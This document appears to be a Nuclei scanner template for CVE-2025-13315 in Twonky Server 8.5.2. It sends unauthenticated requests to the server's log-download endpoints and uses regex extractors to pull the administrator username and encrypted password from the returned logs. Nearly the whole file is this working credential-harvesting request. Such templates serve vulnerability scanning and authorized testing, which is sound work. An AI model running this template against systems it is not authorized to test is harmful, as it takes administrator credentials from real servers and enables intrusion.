id: CVE-2025-13315

info:
  name: Twonky Server 8.5.2 - Unauthenticated Log File Leak (CVE-2025-13315)
  author: 0xBlackash
  severity: critical
  description: |
    An unauthenticated attacker can access /nmc/rpc/log_getfile and retrieve application logs containing the admin username and encrypted password.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13315
  tags: cve,cve2025,twonky,log-leak,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"
      - "{{BaseURL}}/rpc/log_getfile"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - "len(body) > 50000"   # Most Twonky logs are large (your case was 340KB)
          - "duration < 10"       # Quick response

      - type: word
        words:
          - "Twonky"
          - "Media Server"
          - "accessuser"
          - "accesspwd"
          - "||"
        condition: or
        part: body
        case-insensitive: true

    extractors:
      - type: regex
        name: username
        regex:
          - '(?i)(?:accessuser|username|admin)\s*[:=]\s*([^\s\r\n]+)'
        part: body

      - type: regex
        name: encrypted_password
        regex:
          - '(?i)(?:accesspwd|password)\s*[:=]\s*([^\s\r\n]+)'
        part: body

      - type: regex
        name: encrypted_hex
        regex:
          - '\|\|([0-9a-fA-F]{16,})'
        part: body